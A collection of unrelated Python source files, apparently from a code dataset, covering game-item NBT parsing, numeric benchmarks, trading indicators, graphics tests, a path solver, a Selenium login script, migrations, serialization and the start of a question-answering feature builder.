re.sub('[✪⚚✦◆™©�]', '', extract_generic_display_name(nbt)).strip() # No reforge, we are done if not extract_reforge(nbt): return name general_case = name.split(' ', 1)[-1] # If it's not an exception, just return the general case return REFORGE_EXCEPTIONS.get(name, general_case) def extract_generic_display_name(nbt: NbtTag) -> str: """ Extract the raw display name of an item (with NBT styling) from its NbtTag. :param nbt: The NbtTag to be read. :return: The api_name of the item, as a string. """ return _without_nbt_style(nbt['i'][0]['tag']['display']['Name']) def extract_identifiers(nbt: NbtTag) -> Tuple[str, str, str]: """ Extract the item ID, base name, and display name of an items from its NbtTag. :param nbt: The NbtTag to be read. :return: A tuple describing the item ID, base name, and display name of the item. 
""" api_id = extract_api_id(nbt) # Specialization for single-enchantment books if api_id == 'ENCHANTED_BOOK' and \ len(enchants := extract_enchants(nbt)) == 1: enchant, lvl = enchants[0] # Replace enchant if it matches an exception enchant = ENCHANT_EXCEPTIONS.get(enchant, enchant) item_id = f'{enchant.upper()}_{lvl}_BOOK' base_name = item_id.title().replace('_', ' ') display_name = base_name # Specialization for runes elif api_id == 'RUNE': rune, lvl = extract_rune(nbt) item_id = f'{rune}_RUNE_{lvl}' base_name = extract_generic_base_name(nbt).rsplit(' ', 1)[0] \ + f' {lvl}' display_name = extract_generic_display_name(nbt) # Specialization for pets elif api_id == 'PET': pet_type = extract_pet_type(nbt) item_id = f'{pet_type}_PET' base_name = item_id.title().replace('_', ' ') display_name = extract_generic_display_name(nbt) # Specialization for cake souls elif api_id == 'CAKE_SOUL': item_id = 'CAKE_SOUL' base_name = 'Cake Soul' display_name = extract_generic_display_name(nbt) # General case else: # Drop the fragment prefix item_id = api_id.removeprefix('STARRED_') base_name = extract_generic_base_name(nbt) display_name = extract_generic_display_name(nbt) return item_id, base_name, display_name def extract_stack_size(nbt: NbtTag) -> int: """ Get the number of items in an item stack from the associated NbtTag. :param nbt: The NbtTag to be read. :return: The number of items in the item stack. """ return nbt['i'][0]['Count'] def extract_rarity(nbt: NbtTag) -> str: """ Get the rarity of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The rarity of the item. """ try: lore = nbt['i'][0]['tag']['display']['Lore'] rarity_line = nbt['i'][0]['tag']['display']['Lore'][-1].value # Some runes have a weird footer in their lore if extract_api_id(nbt) == 'RUNE': for tag in lore: line = tag.value if _without_nbt_style(line).endswith('COSMETIC'): rarity_line = line words = _without_nbt_style(rarity_line).split() # Account for 'VERY_SPECIAL' case rarity = words[0] if words[0] != 'VERY' else 'VERY_SPECIAL' return rarity if rarity in constants.DISPLAY_RARITIES.keys() else 'UNKNOWN' except KeyError: # Some weird items don't have lore for some reason return 'UNKNOWN' def extract_rune(nbt: NbtTag) -> Optional[Tuple[str, int]]: """ Get rune information of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The rune of the item as a (rune name, level) pair, or None if no rune is associated with the item. """ extra_attrs = _get_extra_attrs(nbt) if 'runes' in extra_attrs: return list(extra_attrs['runes'].items())[0] return None def extract_enchants(nbt: NbtTag) -> List[Tuple[str, int]]: """ Get enchantment information of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: A list of (enchantment, level) pairs describing the enchantments on the item """ extra_attrs = _get_extra_attrs(nbt) enchantments = extra_attrs.get('enchantments', {}).items() return [(ench, lvl) for ench, lvl in enchantments] def extract_is_recombobulated(nbt: NbtTag) -> bool: """ Determine whether or not an item is recombobulated from its NbtTag. :param nbt: The NbtTag to be read. :return: Boolean, whether or not the item is recombobulated. """ extra_attrs = _get_extra_attrs(nbt) return 'rarity_upgrades' in extra_attrs def extract_is_fragged(nbt: NbtTag) -> bool: """ Determine whether or not an item has a Bonzo or Livid fragment applied to it from its NbtTag. :param nbt: The NbtTag to be read. :return: Boolean, whether or not the item is fragged. 
""" return extract_api_id(nbt).startswith('STARRED_') def extract_hot_potato_count(nbt: NbtTag) -> int: """ Determine the number of hot potato book upgrades on an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The number of hot potato book upgrades on the given item. """ extra_attrs = _get_extra_attrs(nbt) return extra_attrs.get('hot_potato_count', 0) def extract_reforge(nbt: NbtTag) -> Optional[str]: """ Get the reforge on an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The reforge of the item, or None if no reforge is present. """ extra_attrs = _get_extra_attrs(nbt) return extra_attrs.get('modifier') def extract_dungeon_stars(nbt: NbtTag) -> int: """ Get the number of dungeon stars on an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The number of dungeon stars on the item. """ extra_attrs = _get_extra_attrs(nbt) return extra_attrs.get('dungeon_item_level', 0) def extract_pet_type(nbt: NbtTag) -> Optional[str]: """ Get the pet type of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The pet type of the item, if applicable. """ pet_attrs = _get_pet_attrs(nbt) return pet_attrs.get('type') def extract_pet_exp(nbt: NbtTag) -> float: """ Get the pet experience of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The pet experience on the item. """ pet_attrs = _get_pet_attrs(nbt) return pet_attrs.get('exp', 0) def extract_pet_candy_used(nbt: NbtTag) -> int: """ Get the number of pet candies used on an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The number of pet candies on the item. """ pet_attrs = _get_pet_attrs(nbt) return pet_attrs.get('candyUsed', 0)
python
from timeit import timeit nTests=10000 print("Each operation performed {} times".format(nTests)) print("") print("Custom Quaternion") print("") importQuatVec = ''' from MAPLEAF.Motion import Quaternion from MAPLEAF.Motion import Vector v1 = Vector(1, 1, 2) ''' # Test Quaternion speed (init) print("Initializing Quaternion (Axis-Angle):") print(timeit("a = Quaternion(axisOfRotation=v1, angle=1.2)", setup=importQuatVec, number=nTests)) print("Initializing Quaternion (Components):") print(timeit("a = Quaternion(components=[1, 1.2, 2.3, 4.5])", setup=importQuatVec, number=nTests)) setupRotQuat = ''' from MAPLEAF.Motion import Quaternion from MAPLEAF.Motion import Vector qRot = Quaternion(axisOfRotation=Vector(1, 1, 2), angle=1.2) vec = Vector(1, 2, 3) ''' # Test Quaternion speed (rotate) print("Quaternion Rotating Vector:") print(timeit("a = qRot.rotate(vec)", setup=setupRotQuat, number=nTests)) print("") print("Scipy") print("") setupScipyRot = ''' from scipy.spatial.transform import Rotation as R from MAPLEAF.Motion import Vector v1 = list(Vector(1, 1, 2).normalize() * 1.2) ''' # Test Scipy speed (init) print("Initializing Scipy Rotation (Rotation Vector):") print(timeit("a = R.from_rotvec(v1)", setup=setupScipyRot, number=nTests)) setupScipyRot = ''' from scipy.spatial.transform import Rotation as R from MAPLEAF.Motion import Vector v1 = list(Vector(1, 1, 2).normalize() * 1.2) sRot = R.from_rotvec(v1) vec = [1, 2, 3] ''' # Test Scipy speed (rotation) print("Scipy Rotating Vector:") print(timeit("a = sRot.apply(vec)", setup=setupScipyRot, number=nTests)) print("") print("Custom Vector") print("") setup = ''' from MAPLEAF.Motion import Vector import numpy as np a = [1,2,3] v1 = Vector(1,2,3) v2 = Vector(2,3,4) nV1 = np.array([1,2,3]) nV2 = np.array([2,3,4]) ''' print("Initializing Vector (Components):") print(timeit("v1 = Vector(1, 1, 2)", setup=setup, number=nTests)) print("Initializing Vector (list):") print(timeit("v1 = Vector(*a)", setup=setup, number=nTests)) print("Initializing Vector (String):") print(timeit("v1 = Vector('(1 1 2)')", setup=setup, number=nTests)) print("Dot Product:") print(timeit("v3 = v1 * v2", setup=setup, number=nTests)) print("Cross Product:") print(timeit("v1.crossProduct(v2)", setup=setup, number=nTests)) print("") print("Numpy Vector") print("") print("Initializing Vector (Components):") print(timeit("v1 = np.array([1,2,3])", setup=setup, number=nTests)) print("Dot Product:") print(timeit("v3 = np.dot(nV1, nV2)", setup=setup, number=nTests)) print("Cross Product:") print(timeit("v3 = np.cross(nV1, nV2)", setup=setup, number=nTests))
python
# TI & TA from pyti.smoothed_moving_average import smoothed_moving_average as pyti_smmoothed_ma from pyti.simple_moving_average import simple_moving_average as pyti_sma from pyti.bollinger_bands import lower_bollinger_band as pyti_lbb from pyti.bollinger_bands import upper_bollinger_band as pyti_ubb from pyti.accumulation_distribution import accumulation_distribution as acd from pyti.aroon import aroon_up from pyti.aroon import aroon_down from pyti.rate_of_change import rate_of_change as roc from pyti.relative_strength_index import relative_strength_index as pyti_rsi from pyti.commodity_channel_index import commodity_channel_index from pyti.exponential_moving_average import exponential_moving_average as pyti_ema from pyjuque.Indicators.CustomIndicators.SuperTrend import ST from pyjuque.Indicators.CustomIndicators.OTT import ott, smoothrng from pyjuque.Indicators.CustomIndicators.HA import HA from traceback import print_exc def cci(df, period): return commodity_channel_index( df['close'].tolist(), df['high'].tolist(), df['low'].tolist(), period) def sma(df, source, period): return pyti_sma(df[source].tolist(), period) def ema(df, source, period): return pyti_ema(df[source].tolist(), period) def lbb(df, source, period): return pyti_lbb(df[source].tolist(), period) def ubb(df, source, period): return pyti_ubb(df[source].tolist(), period) def rsi(df, source, period): return pyti_rsi(df[source].tolist(), period) def isSupport(df,i): return df['low'][i] < df['low'][i-1] \ and df['low'][i] < df['low'][i+1] \ and df['low'][i+1] < df['low'][i+2] \ and df['low'][i-1] < df['low'][i-2] def isResistance(df,i): return df['high'][i] > df['high'][i-1] \ and df['high'][i] > df['high'][i+1] \ and df['high'][i+1] > df['high'][i+2] \ and df['high'][i-1] > df['high'][i-2] INDICATOR_DICT = { "sma": sma, "ema": ema, "lbb": lbb, "ubb": ubb, "cci": cci, "rsi": rsi, "smoothrng": smoothrng, "ott": ott } def AddIndicator(df, indicator_name:str, col_name, *args): # print("Args are", indicator_name, col_name) # print(args) try: if indicator_name == "ott": df[col_name[0]], df[col_name[1]] = ott(df, *args) else: df[col_name] = INDICATOR_DICT[indicator_name](df, *args) except Exception as e: print_exc() print("\nException raised when trying to compute the", indicator_name, "indicator:\n")
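# --- Hedged usage sketch (not part of the original module) ---
# Shows how AddIndicator is meant to be called: the indicator name selects an
# entry from INDICATOR_DICT and the remaining positional args are forwarded to
# that function. Assumes pandas and the pyti dependencies above are installed;
# the OHLC values below are made up purely for illustration.
if __name__ == "__main__":
    import pandas as pd

    df = pd.DataFrame({
        'open':  [1.0, 1.1, 1.2, 1.3, 1.4, 1.5],
        'high':  [1.1, 1.2, 1.3, 1.4, 1.5, 1.6],
        'low':   [0.9, 1.0, 1.1, 1.2, 1.3, 1.4],
        'close': [1.0, 1.1, 1.2, 1.3, 1.4, 1.5],
    })
    # Adds an 'sma_3' column computed as a 3-period simple moving average of 'close'
    AddIndicator(df, "sma", "sma_3", "close", 3)
    print(df[['close', 'sma_3']])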
python
# -*- coding: utf-8 -*- # Copyright (c) Vispy Development Team. All Rights Reserved. # Distributed under the (new) BSD License. See LICENSE.txt for more info. """ Tests for LinearRegionVisual All images are of size (100,100) to keep a small file size """ import numpy as np from vispy.scene import visuals from vispy.testing import (requires_application, TestingCanvas, run_tests_if_main) from vispy.testing.image_tester import assert_image_approved from vispy.testing import assert_raises @requires_application() def test_linear_region_vertical_horizontal(): """Test vertical and horizontal LinearRegionVisual with a single color""" # Definition of the region pos = np.array([5, 15, 24, 36, 40, 42], dtype=np.float32) # Expected internal pos buffer for vertical region expected_pos_v = np.array([[5.0, -1.], [5.0, 1.], [15.0, -1.], [15.0, 1.], [24.0, -1.], [24.0, 1.], [36.0, -1.], [36.0, 1.], [40.0, -1.], [40.0, 1.], [42.0, -1.], [42.0, 1.]], dtype=np.float32) # Expected internal pos buffer for horizontal region expected_pos_h = np.array([expected_pos_v[:, 1] * -1, expected_pos_v[:, 0]], dtype=np.float32).T # Test both horizontal and vertical region for is_vertical, reference_image in [(True, 'linear_region1.png'), (False, 'linear_region1_h.png')]: expected_pos = expected_pos_v if is_vertical else expected_pos_h with TestingCanvas() as c: # Check set_data is working correctly within visual constructor region = visuals.LinearRegion(pos=pos, color=[0.0, 1.0, 0.0, 0.5], vertical=is_vertical, parent=c.scene) assert np.all(region._pos == expected_pos) assert np.all(region.pos == pos) assert region.is_vertical == is_vertical # Check set_data is working as expected when passing a list as # pos argument region.set_data(pos=list(pos)) assert np.all(region._pos == expected_pos) assert np.all(region.pos == pos) # Check set_data is working as expected when passing a tuple as # pos argument region.set_data(pos=tuple(pos)) assert np.all(region._pos == expected_pos) assert np.all(region.pos == pos) # Test with different dtypes that must be converted to float32 for t in [np.int64, np.float64, np.int32]: region.set_data(pos=pos.astype(t)) assert np.all(region._pos == expected_pos) assert np.all(region.pos == pos) assert_image_approved(c.render(), 'visuals/%s' % reference_image) # Check ValueError is raised when pos is not 1D assert_raises(ValueError, region.set_data, pos=[[1, 2], [3, 4]]) @requires_application() def test_linear_region_color(): """Test the color argument of LinearRegionVisual.set_data() method using a single color """ # Definition of the region pos1 = [5, 42] # Definition of the color of the region color1 = np.array([0.0, 1.0, 0.0, 0.5], dtype=np.float32) # Expected internal color buffer color1_expected = np.array([color1, color1, color1, color1], dtype=np.float32) with TestingCanvas() as c: # Check set_data is working correctly within visual constructor region = visuals.LinearRegion(pos=pos1, color=color1, parent=c.scene) assert np.all(region._color == color1_expected) assert np.all(region.color == color1) # Check set_data is working as expected when passing a list as # color argument region.set_data(color=list(color1)) assert np.all(region._color == color1_expected) assert np.all(region.color == color1) # Check set_data is working as expected when passing a tuple as # color argument region.set_data(color=tuple(color1)) assert np.all(region._color == color1_expected) assert np.all(region.color == color1) # Test with different dtypes that must be converted to float32 
region.set_data(color=color1.astype(np.float64)) assert np.all(region._color == color1_expected) assert np.all(region.color == color1) assert_image_approved(c.render(), 'visuals/linear_region1.png') # Check a ValueError is raised when the length of color argument # is not 4. assert_raises(ValueError, region.set_data, color=[1.0, 0.5, 0.5]) # Check a ValueError is raised when too many colors are provided assert_raises(ValueError, region.set_data, color=[color1, color1, color1]) @requires_application() def test_linear_region_gradient(): """Test LinearRegionVisual with a gradient as color""" # Definition of the region pos2 = [5, 42, 80] # Definition of the color of the region color2 = np.array([[0.0, 1.0, 0.0, 0.5], [1.0, 0.0, 0.0, 0.75], [0.0, 0.0, 1.0, 1.0]], dtype=np.float32) # Expected internal color buffer color2_expected = np.array([color2[0], color2[0], color2[1], color2[1], color2[2], color2[2]], dtype=np.float32) with TestingCanvas() as c: # Check set_data is working correctly within visual constructor region = visuals.LinearRegion(pos=pos2, color=color2, parent=c.scene) assert np.all(region._color == color2_expected) assert np.all(region.color == color2) assert_image_approved(c.render(), 'visuals/linear_region2.png') run_tests_if_main()
python
import numpy as np from heapq import heappush, heappop from dataclasses import dataclass, field import os @dataclass(order=True) class PosItem: priority: int pos: tuple[int, int] = field(compare=False) path = os.path.join(os.path.dirname(__file__), "input.txt") def find_path(arr): pq = [] visited = set() cost = np.zeros_like(arr, dtype=np.int32) cost.fill(2 ** 31 - 1) prev = np.zeros(shape=(cost.shape[0], cost.shape[1], 2), dtype=np.int32) cost[0, 0] = 0 pq.append(PosItem(0, (0, 0))) while pq: item = heappop(pq) r, c = item.pos visited.add((r, c)) if ( (r + 1, c) not in visited and r < arr.shape[0] - 1 and cost[r, c] + arr[r + 1, c] < cost[r + 1, c] ): cost[r + 1, c] = cost[r, c] + arr[r + 1, c] prev[r + 1, c, :] = [r, c] heappush(pq, PosItem(cost[r + 1, c], (r + 1, c))) if ( (r, c + 1) not in visited and c < arr.shape[1] - 1 and cost[r, c] + arr[r, c + 1] < cost[r, c + 1] ): cost[r, c + 1] = cost[r, c] + arr[r, c + 1] prev[r, c + 1, :] = [r, c] heappush(pq, PosItem(cost[r, c + 1], (r, c + 1))) return prev, cost if __name__ == "__main__": with open(path) as file: contents = file.read() arr = np.asarray( [[int(n) for n in line] for line in contents.split("\n")], dtype=np.int32 ) prev, cost = find_path(arr) print(f"Lowest cost path is {cost[cost.shape[0]-1, cost.shape[1]-1]}")
python
from selenium import webdriver browser = webdriver.Firefox(executable_path=r"C:\Windows\geckodriver.exe") browser.get("https://github.com") browser.maximize_window() browser.implicitly_wait(20) sign_in = browser.find_element_by_link_text("Sign in") sign_in.click() user_name = browser.find_element_by_id("login_field") user_name.send_keys("user_name") password = browser.find_element_by_id("password") password.send_keys("password") password.submit() profile_link = browser.find_element_by_class_name("user-profile-link") link_label = profile_link.get_attribute("innerHTML") assert "username" in link_label browser.quit()
python
import unittest import Models class BasicTestMethods(unittest.TestCase): def test_asdf(self): self.assertEqual(Models.asdf(), "asdf", 'nah') self.assertNotEqual(Models.asdf(), "asdf1", 'nah') #self.assertEqual(asdf(), "asdf1", 'nah') if __name__ == '__main__': unittest.main()
python
#!/usr/bin/env python
"""AVIM build configuration"""

from os import path
from datetime import date
from build import BuildConfig

# Type of build to produce.
CONFIG = BuildConfig.RELEASE

# Incremented version number.
# See <https://developer.mozilla.org/en-US/docs/Toolkit_version_format>.
VERSION = (5, 8, 2)

# Build date.
DATE = None

# Name to use in the build's directories.
PACKAGE_NAME = "avim"

# Paths to directories that constitute the chrome JAR file.
CHROME_PROVIDERS = ["content", "locale", "skin"]

# Paths to miscellaneous files that should be included in the build's root
# directory. install.rdf and chrome.manifest are automatically included.
ROOT_FILES = ["LICENSE"]

# Paths to directories that should be included, uncompressed, in the build's
# root directory.
ROOT_DIRS = ["components", "defaults"]

# Paths to files to be preprocessed. These files contain placeholders that
# should be interpreted as variables.
VAR_FILES = ["install.rdf", "chrome.manifest", "LICENSE",
             path.join("content", "options.xul")]

# File extensions of files to be preprocessed.
VAR_EXTS = ["js"]

# Names of files to be preprocessed.
VAR_NAMES = ["options.dtd"]

# Paths to directories that should be omitted from a release build.
DEBUG_DIRS = [path.join("originals"), path.join("tests"),
              path.join("content", "test"),
              path.join("content", "skin", "test"),
              path.join("skin", "test"),
              # Unmaintained localizations
              path.join("locale", "fr"), path.join("locale", "zh-TW")]

# Names of localization files that should be omitted from a release build.
L10N_FILES = ["amo.dtd", "install.dtd"]

# Dictionary mapping subdirectories of locale/ to BabelZilla-compatible locale
# codes. Locale names that are already compatible can be omitted.
LOCALE_DIRS = {"en": "en-US", "es": "es-ES"}

# Name of the fallback locale that is guaranteed to contain translations for all
# the extension's strings and that contains documentation for each string.
MAIN_LOCALE = "en-US"

# Paths to the final XPI files.
XPI_FILES = ["%(package)s.xpi", "%(package)s-%(version)s.xpi"]
python
import sys sys.path.append('../src/') print(sys.path) import Histograms import unittest import numpy import time class MyTestCase(unittest.TestCase): def setUp(self): pass def test_learnSingleton(self): m = Histograms.Histograms({ "histograms": ["test"] , "AllowLimit": 10 , "LearnLimit": 3 , "collectorId": "mygate" , "minimumLearning": 100 }) for i in range(1000): r = m.assess({'histograms': [[4, 4, 0, 1E10-1, 0, 0]]}) print(r) print(m.mean) self.assertLess(r[0], 0.25) m.learn() print(m.keys) self.assertEqual(len(m.keys["test-01"]), 1) self.assertAlmostEqual(m.mean[0][0], 1.0, delta=0.05) self.assertLess(m.sdev[0][0], 0.2) def test_store_load(self): m = Histograms.Histograms({ "histograms": ["test"] , "AllowLimit": 10 , "LearnLimit": 3 , "collectorId": "mygate" , "minimumLearning": 100 }) for i in range(1000): r = m.assess({'histograms': [[4, 4, 0, 1E10-1, 0, 0]]}) print (r) self.assertLess(r[0], 0.25) m.learn() status = {} m.crdstore(status) print(status) self.assertTrue("histograms" in status) values = status["histograms"] self.assertTrue(isinstance(values, dict)) self.assertTrue("_n" in values) self.assertEqual(values["_n"], 1000) self.assertTrue("test-01" in values) val = values["test-01"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(1000, val["s"], delta=10) self.assertAlmostEqual(1000, val["s2"], delta=10) self.assertTrue("test-12" in values) val = values["test-12"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(5000, val["s"], delta=10) self.assertAlmostEqual(25000, val["s2"], delta=100) self.assertTrue("test-23" in values) val = values["test-23"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(1E-7, val["s"] , delta=1E-7) self.assertAlmostEqual(1E-10, val["s2"], delta=1E-6) self.assertTrue("test-34" in values) val = values["test-34"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertGreaterEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(1000000, val["s"] , delta=100) self.assertAlmostEqual(10000000, val["s2"], delta=1000) self.assertTrue("test-45" in values) val = values["test-45"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(10, val["s"] , delta=1) self.assertAlmostEqual(0.1, val["s2"], delta=0.01)
python
"""User details and sex of patient added Revision ID: 7d4bab0acebb Revises: b4bb7697ace6 Create Date: 2017-09-14 14:53:07.958616 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '7d4bab0acebb' down_revision = 'b4bb7697ace6' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column('patients', sa.Column('sex', sa.String(length=1), nullable=True)) op.add_column('users', sa.Column('f_name', sa.String(length=50), nullable=True)) op.add_column('users', sa.Column('initials', sa.String(length=10), nullable=True)) op.add_column('users', sa.Column('l_name', sa.String(length=50), nullable=True)) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_column('users', 'l_name') op.drop_column('users', 'initials') op.drop_column('users', 'f_name') op.drop_column('patients', 'sex') # ### end Alembic commands ###
python
""" Author: Justin Cappos Start date: October 9th, 2009 Purpose: A simple library that serializes and deserializes built-in repy types. This includes strings, integers, floats, booleans, None, complex, tuples, lists, sets, frozensets, and dictionaries. There are no plans for including objects. Note: that all items are treated as separate references. This means things like 'a = []; a.append(a)' will result in an infinite loop. If you have 'b = []; c = (b,b)' then 'c[0] is c[1]' is True. After deserialization 'c[0] is c[1]' is False. I can add support or detection of this if desired. """ # The basic idea is simple. Say the type (a character) followed by the # type specific data. This is adequate for simple types # that do not contain other types. Types that contain other types, have # a length indicator and then the underlying items listed sequentially. # For a dict, this is key1value1key2value2. def serializedata(data): """ <Purpose> Convert a data item of any type into a string such that we can deserialize it later. <Arguments> data: the thing to seriailize. Can be of essentially any type except objects. <Exceptions> TypeError if the type of 'data' isn't allowed <Side Effects> None. <Returns> A string suitable for deserialization. """ # this is essentially one huge case statement... # None if type(data) == type(None): return 'N' # Boolean elif type(data) == type(True): if data == True: return 'BT' else: return 'BF' # Integer / Long elif type(data) is int or type(data) is long: datastr = str(data) return 'I'+datastr # Float elif type(data) is float: datastr = str(data) return 'F'+datastr # Complex elif type(data) is complex: datastr = str(data) if datastr[0] == '(' and datastr[-1] == ')': datastr = datastr[1:-1] return 'C'+datastr # String elif type(data) is str: return 'S'+data # List or tuple or set or frozenset elif type(data) is list or type(data) is tuple or type(data) is set or type(data) is frozenset: # the only impact is the first letter... if type(data) is list: mystr = 'L' elif type(data) is tuple: mystr = 'T' elif type(data) is set: mystr = 's' elif type(data) is frozenset: mystr = 'f' else: raise Exception("InternalError: not a known type after checking") for item in data: thisitem = serializedata(item) # Append the length of the item, plus ':', plus the item. 1 -> '2:I1' mystr = mystr + str(len(thisitem))+":"+thisitem mystr = mystr + '0:' return mystr # dict elif type(data) is dict: mystr = 'D' keysstr = serializedata(data.keys()) # Append the length of the list, plus ':', plus the list. mystr = mystr + str(len(keysstr))+":"+keysstr # just plop the values on the end. valuestr = serializedata(data.values()) mystr = mystr + valuestr return mystr # Unknown!!! else: raise TypeError("Unknown type '"+str(type(data))+"' for data :"+str(data)) def deserializedata(datastr): """ <Purpose> Convert a serialized data string back into its original types. <Arguments> datastr: the string to deseriailize. <Exceptions> ValueError if the string is corrupted TypeError if the type of 'data' isn't allowed <Side Effects> None. <Returns> Items of the original type """ if type(datastr) != str: raise TypeError("Cannot deserialize non-string of type '"+str(type(datastr))+"'") typeindicator = datastr[0] restofstring = datastr[1:] # this is essentially one huge case statement... 
# None if typeindicator == 'N': if restofstring != '': raise ValueError("Malformed None string '"+restofstring+"'") return None # Boolean elif typeindicator == 'B': if restofstring == 'T': return True elif restofstring == 'F': return False raise ValueError("Malformed Boolean string '"+restofstring+"'") # Integer / Long elif typeindicator == 'I': try: return int(restofstring) except ValueError: raise ValueError("Malformed Integer string '"+restofstring+"'") # Float elif typeindicator == 'F': try: return float(restofstring) except ValueError: raise ValueError("Malformed Float string '"+restofstring+"'") # Float elif typeindicator == 'C': try: return complex(restofstring) except ValueError: raise ValueError("Malformed Complex string '"+restofstring+"'") # String elif typeindicator == 'S': return restofstring # List / Tuple / set / frozenset / dict elif typeindicator == 'L' or typeindicator == 'T' or typeindicator == 's' or typeindicator == 'f': # We'll split this and keep adding items to the list. At the end, we'll # convert it to the right type thislist = [] data = restofstring # We'll use '0:' as our 'end separator' while data != '0:': lengthstr, restofdata = data.split(':', 1) length = int(lengthstr) # get this item, convert to a string, append to the list. thisitemdata = restofdata[:length] thisitem = deserializedata(thisitemdata) thislist.append(thisitem) # Now toss away the part we parsed. data = restofdata[length:] if typeindicator == 'L': return thislist elif typeindicator == 'T': return tuple(thislist) elif typeindicator == 's': return set(thislist) elif typeindicator == 'f': return frozenset(thislist) else: raise Exception("InternalError: not a known type after checking") elif typeindicator == 'D': lengthstr, restofdata = restofstring.split(':', 1) length = int(lengthstr) # get this item, convert to a string, append to the list. keysdata = restofdata[:length] keys = deserializedata(keysdata) # The rest should be the values list. values = deserializedata(restofdata[length:]) if type(keys) != list or type(values) != list or len(keys) != len(values): raise ValueError("Malformed Dict string '"+restofstring+"'") thisdict = {} for position in xrange(len(keys)): thisdict[keys[position]] = values[position] return thisdict # Unknown!!! else: raise ValueError("Unknown typeindicator '"+str(typeindicator)+"' for data :"+str(restofstring))
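# --- Hedged usage sketch (not part of the original library) ---
# Round-trips a nested value through serializedata/deserializedata to show the
# type-prefixed string format described above (e.g. a dict becomes 'D' plus the
# serialized key list followed by the serialized value list). Written to match
# the library's Python 2 / repy style.
def _serialize_example():
  original = {'name': 'node1', 'ports': [80, 443], 'active': True}
  encoded = serializedata(original)
  restored = deserializedata(encoded)
  assert restored == original
  return encoded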
python
""" Author: William Gabriel Carreras Oropesa Date: April 19, 2020, Neuqué, Argentina module body: This module has implemented a series of functions and objects that will be useful when solving the problem of the N bodies. """ # necessary modules import numpy as np from copy import copy class body(object): def __init__(self, mass, rVec): super(body, self).__init__() self.mass = mass self.rVec = rVec self.vVec = np.array([0, 0], dtype=float) def __str__(self): return "body object: M = {}, R = ({}, {}), V = ({}, {})".format(self.mass, self.rVec[0], self.rVec[1], self.vVec[0], self.vVec[1]) def setV(self, newV): self.vVec = newV def setR(self, newR): self.rVec = newR def gravitationForce(self, P): return (P.mass * (P.rVec - self.rVec))/np.linalg.norm(P.rVec - self.rVec)**3
python
import logging import multiprocessing import unicodedata from argparse import Namespace from contextlib import closing from itertools import chain, repeat from multiprocessing.pool import Pool from tqdm import tqdm from transformers.tokenization_roberta import RobertaTokenizer logger = logging.getLogger(__name__) class InputFeatures(object): def __init__( self, unique_id, example_index, doc_span_index, tokens, mentions, token_to_orig_map, token_is_max_context, word_ids, word_segment_ids, word_attention_mask, entity_ids, entity_position_ids, entity_segment_ids, entity_attention_mask, start_positions, end_positions, ): self.unique_id = unique_id self.example_index = example_index self.doc_span_index = doc_span_index self.tokens = tokens self.mentions = mentions self.token_to_orig_map = token_to_orig_map self.token_is_max_context = token_is_max_context self.word_ids = word_ids self.word_segment_ids = word_segment_ids self.word_attention_mask = word_attention_mask self.entity_ids = entity_ids self.entity_position_ids = entity_position_ids self.entity_segment_ids = entity_segment_ids self.entity_attention_mask = entity_attention_mask self.start_positions = start_positions self.end_positions = end_positions def convert_examples_to_features( examples, tokenizer, entity_vocab, wiki_link_db, model_redirect_mappings, link_redirect_mappings, max_seq_length, max_mention_length, doc_stride, max_query_length, min_mention_link_prob, segment_b_id, add_extra_sep_token, is_training, pool_size=multiprocessing.cpu_count(), chunk_size=30, ): passage_encoder = PassageEncoder( tokenizer, entity_vocab, wiki_link_db, model_redirect_mappings, link_redirect_mappings, max_mention_length, min_mention_link_prob, add_extra_sep_token, segment_b_id, ) worker_params = Namespace( tokenizer=tokenizer, max_seq_length=max_seq_length, doc_stride=doc_stride, max_query_length=max_query_length, add_extra_sep_token=add_extra_sep_token, passage_encoder=passage_encoder, is_training=is_training, ) features = [] unique_id = 1000000000 with closing(Pool(pool_size, initializer=_initialize_worker, initargs=(worker_params,))) as pool: with tqdm(total=len(examples)) as pbar: for ret in pool.imap(_process_example, enumerate(examples), chunksize=chunk_size): for feature in ret: feature.unique_id = unique_id features.append(feature) unique_id += 1 pbar.update() return features class PassageEncoder(object): def __init__( self, tokenizer, entity_vocab, wiki_link_db, model_redirect_mappings, link_redirect_mappings, max_mention_length, min_mention_link_prob, add_extra_sep_token, segment_b_id, ): self._tokenizer = tokenizer self._entity_vocab = entity_vocab self._wiki_link_db = wiki_link_db self._model_redirect_mappings = 